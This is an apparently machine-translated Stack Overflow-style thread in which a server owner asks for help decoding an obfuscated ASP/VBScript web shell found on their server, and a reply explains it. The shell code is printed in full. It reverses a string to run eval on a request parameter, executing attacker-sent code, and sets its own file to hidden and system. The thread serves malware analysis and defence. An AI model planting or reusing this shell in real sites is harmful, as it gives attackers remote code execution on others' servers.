Asp.net VB恶意软件工具逆向工程
我在我的服务器上发现了有趣的恶意软件,它做了一些坏事。 现在我正在尝试反向工程,但由于完全缺乏VB\ASP的知识,我需要请您的帮助,同事们Asp.net VB恶意软件工具逆向工程,asp.net,vb.net,Asp.net,Vb.net,我在我的服务器上发现了有趣的恶意软件,它做了一些坏事。 现在我正在尝试反向工程,但由于完全缺乏VB\ASP的知识,我需要请您的帮助,同事们 <% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCoder(")/*/srerif/*/(tseuqer lave") Set fso=CreateO
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
据我所知,它执行一些命令,并在某处创建具有system\隐藏属性的文件。
主要的问题是-如何使用它,也就是说,从我看到的日志来看,黑客上传了这个文件,并使用POST命令这个文件。我也想通过命令来理解,他是如何将文件上传到一些文件夹的,他应该能够做到这一点
欢迎任何意见。带有curl POST的示例将是惊人的。不,不需要VB中的知识来研究代码的功能;只需阅读文档即可
MorfiCoder(“)/*/srerif/*/(tseuqer-lave”)
返回eval请求(“firers”)
(我假设Replace
或StrReverse
之类的函数是显而易见的)
执行和评估是不言自明的;请求
的文档包括:
请求对象检索客户端浏览器在HTTP请求期间传递给服务器的值
因此,无论firers
request变量中的字符串是什么,它都将被执行(您说您已经知道攻击者使用简单的POST将数据发送到他的脚本)
Set fso=CreateObject(“Scripting.FileSystemObject”)
Set f=fso.GetFile(Request.ServerVariables(“PATH\u TRANSLATED”))
a;使用中的路径
然后在该文件对象上设置一些(Archive
、System
、Hidden
、ReadOnly
)以隐藏此脚本
显然,您提供的信息无法回答攻击者为何能够将此文件上载到服务器,这也超出了此问题的范围,可能与stackoverflow无关。比如,您是否知道恶意软件是如何到达的?我刚刚在我的服务器上找到了它(使用Adodb.Stream而不是FileSystemObject)。需要知道这是怎么做到的。@tofutim我在一台安全系统很差的windows服务器上发现了同样的情况……实际上在过去一年中不止一次,这是对时间的严重浪费:(